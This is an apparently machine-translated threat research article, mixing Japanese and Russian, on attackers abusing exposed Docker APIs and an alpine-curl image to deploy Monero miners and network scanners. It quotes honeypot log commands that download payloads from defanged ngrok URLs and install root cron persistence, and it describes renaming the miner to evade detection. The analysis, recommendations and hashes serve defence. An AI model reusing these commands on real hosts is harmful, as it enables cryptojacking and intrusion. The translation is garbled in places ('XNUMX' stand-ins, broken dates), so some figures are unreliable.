非独自の Docker API とコミュニティからのパブリック イメージが暗号通貨マイナーを配布するためにどのように使用されているか

私たちは、脅威を追跡するために作成したハニーポット コンテナを使用して収集されたデータを分析しました。 また、Docker Hub 上のコミュニティ公開イメージを使用して、不正なコンテナとしてデプロイされた、望ましくない、または未承認の暗号通貨マイナーによる重大なアクティビティを検出しました。 このイメージは、悪意のある仮想通貨マイナーを配信するサービスの一部として使用されます。

さらに、オープンな隣接するコンテナーやアプリケーションに侵入するために、ネットワークを操作するためのプログラムがインストールされます。

ハニーポットをそのまま、つまりデフォルト設定のままにし、セキュリティ対策やその後の追加ソフトウェアのインストールは行いません。 Docker には、エラーや単純な脆弱性を回避するための初期セットアップに関する推奨事項があることに注意してください。 ただし、使用されるハニーポットはコンテナであり、コンテナ内のアプリケーションではなく、コンテナ化プラットフォームを狙った攻撃を検出するように設計されています。

検出された悪意のあるアクティビティは、脆弱性を必要とせず、Docker のバージョンにも依存しないため、注目に値します。 攻撃者が多数のオープン サーバーに感染するために必要なのは、正しく構成されていないオープンなコンテナ イメージを見つけることだけです。

非クローズドの Docker API を使用すると、ユーザーはさまざまな処理を実行できます。 チームこれには、実行中のコンテナーのリストの取得、特定のコンテナーからのログの取得、開始、停止 (強制を含む)、さらには指定された設定を持つ特定のイメージからの新しいコンテナーの作成が含まれます。

左側はマルウェアの配信方法です。 右側は攻撃者の環境で、イメージのリモートロールアウトを可能にします。

3762 のオープン Docker API の国別の分布。 12.02.2019 年 XNUMX 月 XNUMX 日付けの Shodan 検索に基づく

攻撃チェーンとペイロードのオプション

悪意のあるアクティビティはハニーポットの助けだけで検出されたわけではありません。 Shodan からのデータは、Monero 暗号通貨マイニング ソフトウェアをデプロイするためのブリッジとして使用された構成が間違っているコンテナを調査して以来、公開されている Docker API (2018 番目のグラフを参照) の数が増加していることを示しています。 昨年XNUMX月（XNUMX年現在データ） あなたはこのように見えることができます 約。 翻訳者) オープン API は 856 個しかありませんでした。

ハニーポットのログを調査したところ、コンテナー イメージの使用が、 グローク、安全な接続を確立したり、公的にアクセス可能なポイントから指定されたアドレスまたはリソース (ローカルホストなど) にトラフィックを転送したりするためのツールです。 これにより、攻撃者はオープン サーバーにペイロードを配信するときに URL を動的に作成できます。 以下は、ngrok サービスの悪用を示すログのコード例です。

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

ご覧のとおり、アップロードされたファイルは常に変化する URL からダウンロードされます。 これらの URL の有効期限は短いため、有効期限を過ぎるとペイロードをダウンロードできなくなります。

Есть два варианта полезной нагрузки. Первый — скомпилированный майнер в формате ELF для Linux (определяемый как Coinminer.SH.MALXMR.ATNO), который подключается к пулу для майнинга. Второй — скрипт (TrojanSpy.SH.ZNETMAP.A), предназначенный для получения определенных сетевых инструментов, используемых для сканирования сетевых диапазонов и последующего поиска новых целей.

ドロッパー スクリプトは XNUMX つの変数を設定し、それらは暗号通貨マイナーのデプロイに使用されます。 HOST 変数には悪意のあるファイルが配置されている URL が含まれており、RIP 変数はデプロイされるマイナーのファイル名 (実際にはハッシュ) です。 HOST 変数は、ハッシュ変数が変更されるたびに変更されます。 このスクリプトは、攻撃されたサーバー上で他の仮想通貨マイナーが実行されていないことも確認しようとします。

HOST 変数と RIP 変数の例、および他のマイナーが実行されていないことを確認するために使用されるコード スニペット

Прежде чем запускать майнер, он переименовывается в nginx. Другие версии этого скрипта переименовывают майнер в другие легитимные сервисы, которые могут присутствовать в окружениях Linux. Этого обычно достаточно для обхода проверок по списку запущенных процессов.

検索スクリプトにも機能があります。 同じ URL サービスと連携して必要なツールを展開します。 その中には、ネットワークをスキャンして開いているポートのリストを取得するために使用される zmap バイナリがあります。 このスクリプトは、見つかったサービスと対話し、サービスからバナーを受信して​​、見つかったサービスに関する追加情報 (バージョンなど) を確認するために使用される別のバイナリも読み込みます。

このスクリプトでは、スキャンするいくつかのネットワーク範囲も事前に決定されますが、これはスクリプトのバージョンによって異なります。 また、スキャンを実行する前に、サービス (この場合は Docker) からターゲット ポートを設定します。

Как только найдены предполагаемые цели — автоматически из них снимаются баннеры. Скрипт также фильтрует цели в зависимости от интересующих его сервисов, приложений, компонентов или платформ: Redis, Jenkins, Drupal, MODX, Kubernetesマスター、Docker 1.16 クライアントと Apache CouchDB。 スキャンされたサーバーがそれらのいずれかに一致した場合、それはテキスト ファイルに保存され、攻撃者はその後の分析やハッキングにそれを使用できます。 これらのテキスト ファイルは、動的リンクを介して攻撃者のサーバーにアップロードされます。 つまり、ファイルごとに別の URL が使用されるため、以降のアクセスは困難になります。

次の XNUMX つのコードでわかるように、攻撃ベクトルは Docker イメージです。

上部は正規のサービスへの名前変更、下部はネットワークのスキャンに zmap が使用される方法を示しています。

上部には事前定義されたネットワーク範囲があり、下部には Docker などのサービスを検索するための特定のポートがあります。

スクリーンショットは、アルパイン カールの画像が 10 万回以上ダウンロードされたことを示しています

На основе Alpine Linux и curl, ресурсоэффективного инструмента CLI для передачи файлов по различным протоколам, можно собрать Dockerイメージ。 前の画像からわかるように、この画像はすでに 10 万回以上ダウンロードされています。 大量のダウンロードは、このイメージをエントリ ポイントとして使用していることを意味している可能性があります。このイメージは XNUMX か月以上前に更新されており、ユーザーはこのリポジトリから他のイメージをそれほど頻繁にダウンロードしていません。 ドッカー内 エントリーポイント - コンテナを実行するように構成するために使用される一連の命令。 エントリ ポイントの設定が正しくない場合 (たとえば、コンテナーがインターネットから開いたままになっている場合)、イメージが攻撃ベクトルとして使用される可能性があります。 攻撃者は、構成が間違っているか、サポートされていないコンテナが開いていることを発見した場合、これを使用してペイロードを配信する可能性があります。

このイメージ (alpine-curl) 自体は悪意のあるものではありませんが、上で見たように、悪意のある機能を実行するために使用される可能性があることに注意することが重要です。 同様の Docker イメージを使用して、悪意のあるアクティビティを実行することもできます。 私たちは Docker に連絡し、この問題について協力しました。

提言

設定が間違っています 遺体 絶え間ない問​​題 多くの企業、特に導入している企業にとって DevOps、迅速な開発と配信に重点を置いています。 監査と監視のルールに準拠する必要性、データの機密性を監視する必要性、さらにそれらの不遵守による多大な損害によって、すべてがさらに悪化します。 セキュリティの自動化を開発ライフサイクルに組み込むと、検出されない可能性のあるセキュリティ ホールを発見できるだけでなく、アプリケーションのデプロイ後に発見された脆弱性や構成ミスごとに追加のソフトウェア ビルドを実行するなど、不必要な作業負荷を軽減することもできます。

この記事で説明した事件は、次の推奨事項を含め、最初から安全を考慮する必要性を強調しています。

• システム管理者および開発者の場合: API 設定を常にチェックして、特定のサーバーまたは内部ネットワークからのリクエストのみを受け入れるようにすべてが構成されていることを確認してください。
• 最小権限の原則に従います。コンテナ イメージが署名および検証されていることを確認し、重要なコンポーネント (コンテナ起動サービス) へのアクセスを制限し、ネットワーク接続に暗号化を追加します。
• 従う 推奨事項 セキュリティメカニズムを有効にします。 ドッカーから そして内蔵の セキュリティ機能.
• ランタイムとイメージの自動スキャンを使用して、コンテナ内で実行されているプロセスに関する追加情報を取得します (スプーフィングの検出や脆弱性の検索など)。 アプリケーション制御と整合性監視は、サーバー、ファイル、およびシステム領域に対する異常な変更を追跡するのに役立ちます。

トレンドマイクロは、DevOps チームが安全に構築し、迅速に展開し、どこでも起動できるように支援します。 トレンドマイクロ ハイブリッド クラウド セキュリティ 組織の DevOps パイプライン全体に強力かつ合理化された自動化されたセキュリティを提供し、複数の脅威防御を提供します XGen 実行時に物理、仮想、クラウドのワークロードを保護します。 また、コンテナのセキュリティも追加します。 ディープセキュリティ и Deep Security スマートチェック、開発パイプラインの任意の時点で Docker コンテナ イメージをスキャンしてマルウェアや脆弱性を検出し、脅威が展開される前に阻止します。

妥協の兆候

関連するハッシュ:

• 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
• f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

На Docker ビデオコース 実践的な講演者は、上記の状況の発生の可能性を最小限に抑えるか完全に回避するために、最初にどのような設定を行う必要があるかを示します。 そして、19月21日とXNUMX日にはオンライン集中講義が行われました。 DevOps ツールとチート これらのセキュリティ問題や同様のセキュリティ問題について、同僚や現役の教師とラウンド テーブルで話し合うことができます。そこでは、誰もが声を上げ、経験豊富な同僚の苦労や成功の話に耳を傾けることができます。

出所： habr.com